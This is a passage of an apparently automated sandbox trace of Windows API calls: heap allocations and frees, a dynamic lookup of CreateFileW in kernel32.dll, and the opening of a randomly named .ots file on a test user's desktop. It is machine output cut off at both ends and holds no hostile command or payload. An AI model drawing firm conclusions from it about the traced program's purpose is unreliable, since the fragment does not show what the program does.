returned 1 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0128.256] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0128.256] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0128.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0128.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0128.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0128.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0128.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.257] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0128.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0128.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0128.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0128.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0128.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0128.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0128.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0128.258] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0128.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0128.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0128.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0128.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0128.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0128.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0128.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0128.259] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0128.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0128.260] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0128.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0128.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0128.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.260] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0128.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0128.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0128.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0128.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0128.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0128.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0128.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0128.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0128.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0128.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0128.261] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0128.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0128.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0128.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0128.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0128.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0128.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0128.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0128.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0128.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0128.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0128.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0128.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0128.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0128.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0128.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0128.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0128.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0128.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0128.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0128.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0128.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0128.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0128.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0128.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0128.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0128.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0128.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0128.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0128.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.342] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0128.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0128.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0128.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0128.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0128.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca9d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0128.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.343] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0128.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0128.343] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0128.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0128.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0128.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0128.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0128.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0128.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0128.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0128.343] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0128.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0128.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0128.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0128.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0128.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0128.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0128.344] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xV3SDT.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\xv3sdt.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0128.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0128.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0128.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0128.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0128.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0128.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0128.344] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0128.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.344] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0128.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0128.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0128.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0128.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a138 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0128.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0128.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0128.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0128.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0128.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0128.345] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0128.345] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0128.346] FreeLibrary (hLibModule=0x772d0000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0128.346] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0128.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 